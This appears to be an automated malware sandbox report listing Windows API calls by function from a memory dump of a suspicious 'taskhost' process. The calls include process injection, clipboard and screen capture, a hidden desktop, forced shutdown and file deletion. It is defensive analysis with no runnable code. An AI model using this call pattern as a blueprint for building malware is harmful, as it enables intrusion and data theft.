Part of subcall function 011A6B28: TranslateMessage.USER32(?), ref: 011A6B4A
Part of subcall function 011A6B28: DispatchMessageW.USER32(?), ref: 011A6B55
Part of subcall function 011A6B28: PeekMessageW.USER32(00000000), ref: 011A6B65
Part of subcall function 011A6B28: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 011A6B79

InternetSetStatusCallbackW.WININET(?,?), ref: 011AA389

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A3346: HeapAlloc.KERNEL32(00000008,-00000003,011A36F5,?,?,00000000,011A41E1,?,011A2070,?,?,?,011A4191,?,?,?), ref: 011A3368
Part of subcall function 011A3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,011A36F5,?,?,00000000,011A41E1,?,011A2070,?,?,?,011A4191,?,?), ref: 011A3379

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AB3EC, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 011A8C40: PathCombineW.SHLWAPI(011A1F45,011A1F45,?), ref: 011A8C5F

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 011AB437
WriteFile.KERNEL32(011AB3D4,?,00000146,?,00000000), ref: 011AB475
WriteFile.KERNEL32(011AB3D4,?,00000000,?,00000000), ref: 011AB499
FlushFileBuffers.KERNEL32(011AB3D4), ref: 011AB4AD
CloseHandle.KERNEL32(011AB3D4), ref: 011AB4B6

Part of subcall function 011A8716: SetFileAttributesW.KERNELBASE(00000080,00000080,011AB4CD,?), ref: 011A871F
Part of subcall function 011A8716: DeleteFileW.KERNELBASE(?), ref: 011A8729

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AC49B, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

GetProcessId.KERNEL32(?), ref: 011AC509

Part of subcall function 011A245B: CreateMutexW.KERNELBASE(011B2C30,00000001,?,011B2E70,76C605D7,?,00000002,?,76C605D7), ref: 011A24A3
Part of subcall function 011A245B: GetLastError.KERNEL32 ref: 011A24AF
Part of subcall function 011A245B: CloseHandle.KERNEL32(00000000), ref: 011A24BD

Part of subcall function 011A2542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 011A2574
Part of subcall function 011A2542: WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,011A316D,?,00000000,?,?,00000000), ref: 011A25AB
Part of subcall function 011A2542: WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,011A316D,?,00000000,?,?,00000000), ref: 011A25CB
Part of subcall function 011A2542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,011A316D,?,00000000), ref: 011A261A

GetThreadContext.KERNEL32 ref: 011AC557
SetThreadContext.KERNEL32(00000000,00000000), ref: 011AC596
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 011AC5AD
CloseHandle.KERNEL32(?), ref: 011AC5B7

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01195DFB, Relevance: 7.6, APIs: 5, Instructions: 80

APIs

GetWindowInfo.USER32(?,?), ref: 01195E1A
IntersectRect.USER32(?,?), ref: 01195E58
IsRectEmpty.USER32(?), ref: 01195E6A
IntersectRect.USER32(?,?), ref: 01195E81

Part of subcall function 01195C8A: GetWindowThreadProcessId.USER32(?,?), ref: 01195CB4
Part of subcall function 01195C8A: ResetEvent.KERNEL32(00000010), ref: 01195D03
Part of subcall function 01195C8A: PostMessageW.USER32(?,?,?,00000010), ref: 01195D26
Part of subcall function 01195C8A: WaitForSingleObject.KERNEL32(00000010,00000064), ref: 01195D35
Part of subcall function 01195C8A: ResetEvent.KERNEL32(?,?,?,00000010), ref: 01195D60
Part of subcall function 01195C8A: PostThreadMessageW.USER32(?,?,000000FC,?), ref: 01195D70
Part of subcall function 01195C8A: WaitForSingleObject.KERNEL32(?,000003E8), ref: 01195D82
Part of subcall function 01195C8A: TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 01195DA7
Part of subcall function 01195C8A: IntersectRect.USER32(?,?), ref: 01195DC7
Part of subcall function 01195C8A: FillRect.USER32(?,?,00000006), ref: 01195DD9
Part of subcall function 01195C8A: DrawEdge.USER32(?,?,0000000A,0000000F), ref: 01195DED

GetTopWindow.USER32(?), ref: 01195EB1

Part of subcall function 011A7AC1: GetWindow.USER32(?,00000001), ref: 011A7AE3

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AB062, Relevance: 7.6, APIs: 5, Instructions: 70

APIs

GetClipboardData.USER32(?), ref: 011AB06B

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

GlobalLock.KERNEL32(00000000), ref: 011AB09F
EnterCriticalSection.KERNEL32(011B3FB4,00000000,00000000), ref: 011AB0DF

Part of subcall function 011AAD5F: EnterCriticalSection.KERNEL32(011B3FB4,?,?,?,011AB052,?), ref: 011AAD7C
Part of subcall function 011AAD5F: LeaveCriticalSection.KERNEL32(011B3FB4,?,?,?,011AB052,?), ref: 011AAD9D
Part of subcall function 011AAD5F: EnterCriticalSection.KERNEL32(011B3FB4,?,?,?,?,011AB052,?), ref: 011AADAE
Part of subcall function 011AAD5F: LeaveCriticalSection.KERNEL32(011B3FB4,?,?,?,011AB052,?), ref: 011AAE47

LeaveCriticalSection.KERNEL32(011B3FB4,00000000,01194A68), ref: 011AB0F6

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

GlobalUnlock.KERNEL32(?), ref: 011AB109

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A68E0, Relevance: 7.6, APIs: 5, Instructions: 63

APIs

socket.WS2_32(00000000,00000002,00000000), ref: 011A68F2
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 011A691C
WSAGetLastError.WS2_32 ref: 011A6923

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 011A694F

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

#3.WS2_32(?), ref: 011A6963

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A8A29, Relevance: 7.6, APIs: 5, Instructions: 61

APIs

Part of subcall function 011A8C40: PathCombineW.SHLWAPI(011A1F45,011A1F45,?), ref: 011A8C5F

FindFirstFileW.KERNEL32(?,?,?,?), ref: 011A8A5A

Part of subcall function 011A8716: SetFileAttributesW.KERNELBASE(00000080,00000080,011AB4CD,?), ref: 011A871F
Part of subcall function 011A8716: DeleteFileW.KERNELBASE(?), ref: 011A8729

FindNextFileW.KERNEL32(00000000,?), ref: 011A8AB5
FindClose.KERNEL32(00000000), ref: 011A8AC0
SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 011A8ACC
RemoveDirectoryW.KERNEL32(?), ref: 011A8AD3

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01195A01, Relevance: 7.6, APIs: 5, Instructions: 56

APIs

GetUpdateRect.USER32(?,?,?), ref: 01195A88

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

TlsGetValue.KERNEL32 ref: 01195A21
SaveDC.GDI32(?), ref: 01195A51
SendMessageW.USER32(?,00000014,?,00000000), ref: 01195A61
RestoreDC.GDI32(?,00000000), ref: 01195A73

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01195BF6, Relevance: 7.5, APIs: 5, Instructions: 48

APIs

GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,011A30F6), ref: 01195C03
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,011A30F6), ref: 01195C0A
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,011A30F6), ref: 01195C1C

Part of subcall function 011954A9: GetWindowInfo.USER32(?,?), ref: 01195515
Part of subcall function 011954A9: IntersectRect.USER32(?,?,-00000114), ref: 01195538
Part of subcall function 011954A9: IntersectRect.USER32(?,?,-00000114), ref: 0119558E
Part of subcall function 011954A9: GetDC.USER32(00000000), ref: 011955D2
Part of subcall function 011954A9: CreateCompatibleDC.GDI32(00000000), ref: 011955E3
Part of subcall function 011954A9: ReleaseDC.USER32(00000000,00000000), ref: 011955ED
Part of subcall function 011954A9: SelectObject.GDI32(00000000,?), ref: 01195602
Part of subcall function 011954A9: DeleteDC.GDI32(00000000), ref: 01195610
Part of subcall function 011954A9: TlsSetValue.KERNEL32(?), ref: 0119565B
Part of subcall function 011954A9: EqualRect.USER32(?,?), ref: 01195675
Part of subcall function 011954A9: SaveDC.GDI32(00000000), ref: 01195680
Part of subcall function 011954A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0119569B
Part of subcall function 011954A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 011956BB
Part of subcall function 011954A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 011956CD
Part of subcall function 011954A9: RestoreDC.GDI32(00000000,?), ref: 011956E4
Part of subcall function 011954A9: SaveDC.GDI32(00000000), ref: 01195706
Part of subcall function 011954A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0119571C
Part of subcall function 011954A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 01195735
Part of subcall function 011954A9: RestoreDC.GDI32(00000000,?), ref: 01195743
Part of subcall function 011954A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01195756
Part of subcall function 011954A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 01195766
Part of subcall function 011954A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 01195778
Part of subcall function 011954A9: TlsSetValue.KERNEL32(00000000), ref: 01195792
Part of subcall function 011954A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 011957B2
Part of subcall function 011954A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 011957CE
Part of subcall function 011954A9: SelectObject.GDI32(00000000,?), ref: 011957E4
Part of subcall function 011954A9: DeleteDC.GDI32(00000000), ref: 011957EB
Part of subcall function 011954A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01195813
Part of subcall function 011954A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 01195829

SetEvent.KERNEL32(011B2868,?,00000001), ref: 01195C69
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 01195C76

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119B0AD, Relevance: 7.5, APIs: 5, Instructions: 32

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0119B0B3
ReleaseMutex.KERNEL32(?), ref: 0119B0E7
IsWindow.USER32(?), ref: 0119B0EE
PostMessageW.USER32(?,00000215,00000000,?), ref: 0119B108
SendMessageW.USER32(?,00000215,00000000,?), ref: 0119B110

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011998B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 011A74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01197194,?,?,00000104,.exe,00000000), ref: 011A74F4
Part of subcall function 011A74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01197194,?,?,00000104), ref: 011A7575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0119991B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0119996B

Part of subcall function 011A8AE4: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00000000), ref: 011A8B23
Part of subcall function 011A8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 011A8B4A
Part of subcall function 011A8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 011A8B94
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 011A8BC1
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?), ref: 011A8BF1
Part of subcall function 011A8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 011A8C1F
Part of subcall function 011A8AE4: FindClose.KERNELBASE(?,?,?,?,00000000), ref: 011A8C31

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Strings

#, xrefs: 01199951
&, xrefs: 0119994A

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A2828, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52

APIs

Part of subcall function 011A35C6: MultiByteToWideChar.KERNEL32(011A2884,00000000,?,011A1FF2,?,7718F8FF,011A2884,00000000,00000032,?,7718F8FF,00000000), ref: 011A35DD

Part of subcall function 011A8C40: PathCombineW.SHLWAPI(011A1F45,011A1F45,?), ref: 011A8C5F

PathRenameExtensionW.SHLWAPI(?,.dat), ref: 011A28A1

Strings

C:\Users\admin\AppData\Roaming, xrefs: 011A2870, 011A2888
.dat, xrefs: 011A289B
SOFTWARE\Microsoft, xrefs: 011A2855

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119E0FB, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47

APIs

GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0119E108
GetThreadDesktop.USER32(00000000), ref: 0119E10F
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0119E128

Part of subcall function 0119DD09: TlsAlloc.KERNEL32(011B2868,00000000,0000018C,00000000,00000000), ref: 0119DD22
Part of subcall function 0119DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0119DD4A
Part of subcall function 0119DD09: CreateEventW.KERNEL32(011B2C30,00000001,00000000,?,84889912,?,00000001), ref: 0119DD74
Part of subcall function 0119DD09: CreateMutexW.KERNEL32(011B2C30,00000000,?,18782822,?,00000001), ref: 0119DD97
Part of subcall function 0119DD09: CreateFileMappingW.KERNEL32(00000000,011B2C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0119DDC2
Part of subcall function 0119DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0119DDD8
Part of subcall function 0119DD09: GetDC.USER32(00000000), ref: 0119DDF5
Part of subcall function 0119DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 0119DE15
Part of subcall function 0119DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 0119DE1F
Part of subcall function 0119DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0119DE32
Part of subcall function 0119DD09: ReleaseDC.USER32(00000000,?), ref: 0119DE56
Part of subcall function 0119DD09: CreateMutexW.KERNEL32(011B2C30,00000000,?,1898B122,?,00000001,011B28B8,?,00000102,011B28A4,011B2E70,00000010,?,?), ref: 0119DF00
Part of subcall function 0119DD09: GetDC.USER32(00000000), ref: 0119DF15
Part of subcall function 0119DD09: CreateCompatibleDC.GDI32(00000000), ref: 0119DF23
Part of subcall function 0119DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0119DF3A
Part of subcall function 0119DD09: SelectObject.GDI32(00000000,00000000), ref: 0119DF4D
Part of subcall function 0119DD09: ReleaseDC.USER32(00000000,00000001), ref: 0119DF65

Part of subcall function 0119DF74: DeleteObject.GDI32(00000000), ref: 0119DF87
Part of subcall function 0119DF74: CloseHandle.KERNEL32(00000000), ref: 0119DF97
Part of subcall function 0119DF74: TlsFree.KERNEL32(00000000,00000000,011B2868,00000000,0119E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0119DFA2
Part of subcall function 0119DF74: CloseHandle.KERNEL32(00000000), ref: 0119DFB0
Part of subcall function 0119DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,011B2868,00000000,0119E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0119DFBA
Part of subcall function 0119DF74: CloseHandle.KERNEL32(00000000), ref: 0119DFC7
Part of subcall function 0119DF74: SelectObject.GDI32(00000000,00000000), ref: 0119DFE1
Part of subcall function 0119DF74: DeleteObject.GDI32(00000000), ref: 0119DFF2
Part of subcall function 0119DF74: DeleteDC.GDI32(00000000), ref: 0119DFFF
Part of subcall function 0119DF74: CloseHandle.KERNEL32(00000000), ref: 0119E010
Part of subcall function 0119DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0119E01F
Part of subcall function 0119DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0119E038

Strings

N, xrefs: 0119E132

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A89C2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathSkipRootW.SHLWAPI(?), ref: 011A89CD
GetFileAttributesW.KERNEL32(?,?,00000000,011AD261,?,?,?,?,?), ref: 011A89F5
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,011AD261,?,?,?,?,?), ref: 011A8A03

Strings

.exe, xrefs: 011A89C9

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A87C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 011A87D7

Part of subcall function 011A46F4: GetTickCount.KERNEL32(011A8766,?), ref: 011A46F4

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

Part of subcall function 011A8C40: PathCombineW.SHLWAPI(011A1F45,011A1F45,?), ref: 011A8C5F

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 011A8829

Strings

tmp, xrefs: 011A87ED
%s%08x, xrefs: 011A87F2

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119F367, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0119F3CC

Part of subcall function 011AD325: PathRemoveFileSpecW.SHLWAPI(?), ref: 011AD34A
Part of subcall function 011AD325: PathRemoveFileSpecW.SHLWAPI(?), ref: 011AD35D
Part of subcall function 011AD325: SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 011AD39B
Part of subcall function 011AD325: CharToOemW.USER32(?,?), ref: 011AD3B7
Part of subcall function 011AD325: CharToOemW.USER32(?,?), ref: 011AD3C6
Part of subcall function 011AD325: ExitProcess.KERNEL32(00000000), ref: 011AD41C

Part of subcall function 0119E959: CreateMutexW.KERNELBASE(011B2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,01194E69,?,?,?,743C152E,00000002), ref: 0119E97F

ExitWindowsEx.USER32(00000014,80000000), ref: 0119F3DF

Part of subcall function 011A4A87: GetCurrentThread.KERNEL32(00000020,00000000,011AC9A1,00000000,?,?,?,?,011AC9A1,SeTcbPrivilege), ref: 011A4A97
Part of subcall function 011A4A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,011AC9A1,SeTcbPrivilege), ref: 011A4A9E
Part of subcall function 011A4A87: OpenProcessToken.ADVAPI32(000000FF,00000020,011AC9A1,?,?,?,?,011AC9A1,SeTcbPrivilege), ref: 011A4AB0
Part of subcall function 011A4A87: LookupPrivilegeValueW.ADVAPI32(00000000,011AC9A1,?), ref: 011A4AD4
Part of subcall function 011A4A87: AdjustTokenPrivileges.KERNELBASE(011AC9A1,00000000,00000001,00000000,00000000,00000000), ref: 011A4AE9
Part of subcall function 011A4A87: GetLastError.KERNEL32 ref: 011A4AF3
Part of subcall function 011A4A87: CloseHandle.KERNEL32(011AC9A1), ref: 011A4B02

Strings

SeShutdownPrivilege, xrefs: 0119F3AB
, xrefs: 0119F383

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A1E2D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 011A1E4B
PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 011A1E5A
GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 011A1E6E

Strings

C:\Users\admin\AppData\Roaming, xrefs: 011A1E3D, 011A1E42, 011A1E59

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A4BC2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,011A1DBB,00000000,011A22ED), ref: 011A4BCF
GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,011A1DBB,00000000,011A22ED), ref: 011A4BDF

Strings

kernel32.dll, xrefs: 011A4BCA
IsWow64Process, xrefs: 011A4BD9

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AA24F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22

APIs

EnterCriticalSection.KERNEL32(011B3F24), ref: 011AA265
SetEvent.KERNEL32(?), ref: 011AA286
LeaveCriticalSection.KERNEL32(011B3F24), ref: 011AA28D

Strings

3, xrefs: 011AA256

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A0AA1, Relevance: 6.3, APIs: 4, Instructions: 303

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 011A0C73
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 011A0C93
RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 011A0CA6
GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 011A0CB5

Part of subcall function 011A3346: HeapAlloc.KERNEL32(00000008,-00000003,011A36F5,?,?,00000000,011A41E1,?,011A2070,?,?,?,011A4191,?,?,?), ref: 011A3368
Part of subcall function 011A3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,011A36F5,?,?,00000000,011A41E1,?,011A2070,?,?,?,011A4191,?,?), ref: 011A3379

Part of subcall function 011A4660: CryptAcquireContextW.ADVAPI32(011A8C87,00000000,00000000,00000001,F0000040,?,011A8C87,?,00000030,?,?,?,011A91A0,SOFTWARE\Microsoft\Xyuxy), ref: 011A4679
Part of subcall function 011A4660: CryptCreateHash.ADVAPI32(011A8C87,00008003,00000000,00000000,00000030,?,011A8C87,?,00000030,?,?,?,011A91A0,SOFTWARE\Microsoft\Xyuxy), ref: 011A4691
Part of subcall function 011A4660: CryptHashData.ADVAPI32(00000030,00000010,011A8C87,00000000,?,011A8C87), ref: 011A46AD
Part of subcall function 011A4660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,011A8C87), ref: 011A46C5
Part of subcall function 011A4660: CryptDestroyHash.ADVAPI32(00000030,?,011A8C87), ref: 011A46DC
Part of subcall function 011A4660: CryptReleaseContext.ADVAPI32(011A8C87,00000000,?,011A8C87,?,00000030,?,?,?,011A91A0,SOFTWARE\Microsoft\Xyuxy), ref: 011A46E6

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119A088, Relevance: 6.2, APIs: 4, Instructions: 184

APIs

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0119A12E
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0119A159
RegCloseKey.ADVAPI32(?), ref: 0119A28F

Part of subcall function 011A74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01197194,?,?,00000104,.exe,00000000), ref: 011A74F4
Part of subcall function 011A74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01197194,?,?,00000104), ref: 011A7575

Part of subcall function 011A7595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,011A9E26,?,?), ref: 011A75AD

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0119A27C

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119A61C, Relevance: 6.2, APIs: 4, Instructions: 176

APIs

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0119A6AA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0119A6D5
RegCloseKey.ADVAPI32(?), ref: 0119A80C

Part of subcall function 011A74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01197194,?,?,00000104,.exe,00000000), ref: 011A74F4
Part of subcall function 011A74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01197194,?,?,00000104), ref: 011A7575

Part of subcall function 011A7595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,011A9E26,?,?), ref: 011A75AD

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0119A7F9

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AB265, Relevance: 6.1, APIs: 4, Instructions: 129

APIs

